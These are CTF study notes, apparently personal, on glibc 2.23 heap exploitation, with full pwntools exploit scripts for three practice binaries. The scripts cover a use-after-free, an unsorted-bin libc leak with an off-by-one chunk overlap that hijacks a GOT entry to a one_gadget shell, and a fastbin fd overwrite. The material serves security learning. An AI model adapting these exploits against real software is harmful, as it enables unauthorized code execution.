# Glibc Heap Exploit 坐牢笔记 - 0x04

# UAF

# hitcontraining_uaf

uaf 直接秒了

#patchelf --set-interpreter /home/akyuu/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/ld-2.23.so --replace-needed libc.so.6 /home/akyuu/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc.so.6 pwn
from pwn import*

# Connection / context setup for the hacknote challenge (remote instance).
# log_level='debug' echoes every byte sent and received to the terminal.
context.update(log_level='debug', arch='amd64', os='linux')
context.terminal = ['tmux', 'splitw', '-h']

pwn = './hacknote'
p = remote('node5.buuoj.cn', 29733)
# Local alternatives, kept as the author left them:
# p = process(['./ld-2.23.so', pwn], env={"LD_PRELOAD": './libc-2.23.so'})
# p = process('./hacknote')
# gdb.attach(p)
# elf = ELF(pwn)
# libc = ELF('./libc.so.6')

def add(sizd, con):
    """Menu option 1: create a note of *sizd* bytes whose body is *con*.

    Every answer is newline-terminated (sendlineafter), including *con*.
    """
    steps = (
        ("Your choice :", "1"),
        ("Note size :", str(sizd)),
        ("Content :", con),
    )
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)
def dele(idx):
    """Menu option 2: delete the note at index *idx*."""
    answers = ("2", str(idx))
    for prompt, answer in zip(("Your choice :", "Index :"), answers):
        p.sendlineafter(prompt, answer)
def show(idx):
    """Menu option 3: ask the program to print the note at index *idx*."""
    answers = ("3", str(idx))
    for prompt, answer in zip(("Your choice :", "Index :"), answers):
        p.sendlineafter(prompt, answer)

# 0~4
# Two notes of the same size are created and then both deleted; the
# program's note table is presumably left pointing at the freed memory.
add(0x20,'') #0 a1-a2
add(0x20,'') #1 b1-b2

# dele(0)
dele(1)
dele(0)

# Note 2 is 8 bytes and is presumably served from the memory note 0's record
# still points at, so its content overwrites that record. 0x8048945 is a
# fixed address from this specific binary and is not valid for any other
# build. NOTE(review): context is amd64 (p64 writes 8 bytes) but the address
# is in the 32-bit non-PIE range — confirm the target's arch.
add(8,p64(0x8048945)) #2 a1-b1

# show(0) operates on the already-deleted note 0: the use-after-free.
# Program-side fix: clear the table entry on delete and reject stale indices.
show(0)

p.interactive()

# Unsorted Bin Attack + Off By One

# hitcontraining_heapcreator

利用 Unsorted Bin 里面只有一个 chunk 的时候,这个 chunk 的 fd 和 bk 都是指向 main_arena 的固定偏移位置的 “特性”,可以泄露出 libc 基址,从而得到 one_gadget 的地址,也可以得到 system 函数的地址。
之后利用 Off-by-One 修改已 free 的 chunk 的大小再 malloc 它,就可以得到一个覆盖在之后的 chunk 之上的大 chunk,因此修改这个大 chunk 就相当于修改了它覆盖的 chunk。于是我们把保存存储内容的 chunk 地址的那个 chunk 所记录的地址改为 atoi() 的 got 表地址,之后修改这个 chunk 记录的内容就相当于修改 atoi() 的 got 表。(修改 hook 也是可以的,但是我懒得找偏移了。)

#patchelf --set-interpreter /home/akyuu/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/ld-2.23.so --replace-needed libc.so.6 /home/akyuu/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc.so.6 pwn
from pwn import*

# Context / process setup for the heapcreator challenge. The target is run
# locally under the matching 2.23 loader with its libc injected via
# LD_PRELOAD; the remote line is kept for reference.
context.update(log_level='debug', arch='amd64', os='linux')
context.terminal = ['tmux', 'splitw', '-h']

pwn = './heapcreator'
# p = remote('node5.buuoj.cn', 27905)
p = process(['./ld-2.23.so', pwn], env={"LD_PRELOAD": './libc-2.23.so'})
# p = process('./heapcreator')
# gdb.attach(p)
# elf = ELF(pwn)
# libc = ELF('./libc.so.6')
# Menu printed by the target, for reference:
# puts("--------------------------------");
# puts(" Heap Creator ");
# puts("--------------------------------");
# puts(" 1. Create a Heap ");
# puts(" 2. Edit a Heap ");
# puts(" 3. Show a Heap ");
# puts(" 4. Delete a Heap ");
# puts(" 5. Exit ");
# puts("--------------------------------");

def add(size, con):
    """Menu option 1: create a heap of *size* bytes holding *con*.

    The choice and size are newline-terminated; *con* is sent raw
    (sendafter) so no trailing newline ends up in the heap.
    """
    line_steps = (("Your choice :", "1"), ("Size of Heap : ", str(size)))
    for prompt, answer in line_steps:
        p.sendlineafter(prompt, answer)
    # raw send on purpose: the content is not newline-terminated
    p.sendafter("Content of heap:", con)
def edit(idx, con):
    """Menu option 2: overwrite heap *idx* with *con* (sent raw, no newline)."""
    line_steps = (("Your choice :", "2"), ("Index :", str(idx)))
    for prompt, answer in line_steps:
        p.sendlineafter(prompt, answer)
    # raw send on purpose: the content is not newline-terminated
    p.sendafter("Content of heap : ", con)
def show(idx):
    """Menu option 3: ask the program to print heap *idx*."""
    answers = ("3", str(idx))
    for prompt, answer in zip(("Your choice :", "Index :"), answers):
        p.sendlineafter(prompt, answer)
def dele(idx):
    """Menu option 4: delete heap *idx*."""
    answers = ("4", str(idx))
    for prompt, answer in zip(("Your choice :", "Index :"), answers):
        p.sendlineafter(prompt, answer)

# --- leak: read libc pointers back out of a recycled chunk ---
add(0x108,b'a')#0
add(0x58,b'a') #1
dele(0)
# Re-allocating the same size is expected to hand back the chunk just freed;
# only its first 8 bytes are overwritten, so show(0) prints what the
# allocator left behind right after the marker.
add(0x108,b'abcddcba')#0
show(0)

p.recvuntil(b'abcddcba')
# The subtracted offset (0x3c3b78) was read off one local debugging session;
# it is specific to this libc-2.23 build and must be re-derived for any other.
base=u64(p.recv(6)+b'\x00\x00')-(0x00007f03883c3b78-0x7f0388000000)
# 0xf0897 matches the one_gadget listing at the bottom of this file.
execv=base+0xf0897
hook=base+0x11451 #fake -- unused placeholder; never referenced below
print(base)
# hack--->
# gdb.attach(p)
# --- off-by-one: enlarge a freed chunk so it overlaps the heaps after it ---
add(0x18,b'a') #2
dele(2)
add(0x28,b'a') #2
add(0xf8,b'a') #3
add(0x18,b'a') #4
dele(3)
# 0x29 bytes into a 0x28-byte heap: the trailing b'\xf1' is the single-byte
# overflow that reaches the freed neighbour's size field (the bug this
# challenge is about; bounding edit() to the original size closes it).
edit(2,p64(0)*5+b'\xf1')
add(0x1e8,b'a') #3
# Heap 3 now spans heap 4's record. 0x602060 is a fixed address (non-PIE
# binary) — presumably the atoi GOT entry the prose above mentions; verify.
edit(3,b'a'*0xf8+p64(0x21)+p64(0x21)+p64(0x602060))
edit(4,p64(execv))

print(base)

p.interactive()

# akyoi@AkyOI-VM:~/PWN/Heap$ one_gadget libc-2.23.so
# 0x4525a execve("/bin/sh", rsp+0x30, environ)
# constraints:
# [rsp+0x30] == NULL || {[rsp+0x30], [rsp+0x38], [rsp+0x40], [rsp+0x48], ...} is a valid argv

# 0xef9f4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
# [rsp+0x50] == NULL || {[rsp+0x50], [rsp+0x58], [rsp+0x60], [rsp+0x68], ...} is a valid argv

# 0xf0897 execve("/bin/sh", rsp+0x70, environ)
# constraints:
# [rsp+0x70] == NULL || {[rsp+0x70], [rsp+0x78], [rsp+0x80], [rsp+0x88], ...} is a valid argv
# akyoi@AkyOI-VM:~/PWN/Heap$

# Fastbin Attack

# hitcontraining_magicheap

把一个全局变量改成大于某个数值就行了。用 fastbin attack 修改 fd 就行了。

#patchelf --set-interpreter /home/akyuu/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/ld-2.23.so --replace-needed libc.so.6 /home/akyuu/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc.so.6 pwn
from pwn import*

# Context / process setup for the magicheap challenge (local run under the
# 2.23 loader with its libc via LD_PRELOAD). gdb.attach is live here, so the
# script opens a debugger in a new tmux pane (context.terminal) on start.
context.update(log_level='debug', arch='amd64', os='linux')
context.terminal = ['tmux', 'splitw', '-h']

pwn = './magicheap'
# p = remote('node5.buuoj.cn', 26983)
p = process(['./ld-2.23.so', pwn], env={"LD_PRELOAD": './libc-2.23.so'})
# p = process('./magicheap')
gdb.attach(p)
# elf = ELF(pwn)
# libc = ELF('./libc.so.6')

def add(size, con):
    """Menu option 1: create a heap of *size* bytes holding *con*.

    All three answers are newline-terminated.
    """
    steps = (
        ("Your choice :", "1"),
        ("Size of Heap : ", str(size)),
        ("Content of heap:", con),
    )
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)
def edit(idx, con):
    """Menu option 2: rewrite heap *idx* with *con*.

    The program asks for a size before the content; the length of *con*
    is sent as that size, whatever the heap was originally allocated with.
    """
    steps = (
        ("Your choice :", "2"),
        ("Index :", str(idx)),
        ("Size of Heap : ", str(len(con))),
        ("Content of heap : ", con),
    )
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)
def dele(idx):
    """Menu option 3: delete heap *idx*."""
    answers = ("3", str(idx))
    for prompt, answer in zip(("Your choice :", "Index :"), answers):
        p.sendlineafter(prompt, answer)
def hack():
    """Select menu option 4869, which is not listed in the visible menu."""
    hidden_choice = "4869"
    p.sendlineafter("Your choice :", hidden_choice)

add(0x10,b'a') #0
add(0x60,b'a') #1
add(0x10,b'a') #2

dele(1)
# edit() sends the payload length as the new size, so 0x28 bytes go into the
# 0x10-byte heap 0: a heap overflow past its end. The write reaches heap 1's
# header (0x71 re-writes its size unchanged) and its fd, which is pointed at
# a fixed address near the global the prose mentions (the fastbin attack).
# 0x60208d is specific to this non-PIE build. Program-side fix: cap edit()
# at the original allocation size.
edit(0,p64(0)*3+p64(0x71)+p64(0x60208d)) # size 0x602095 b'a'*10+p64(num)

add(0x60,b'a')
# The second 0x60 allocation is expected to be served from the forged fd,
# so its content lands on that global variable.
add(0x60,p64(0x114514))

# Option 4869 — presumably the hidden branch gated on that global; confirm
# in the binary.
hack()
p.interactive()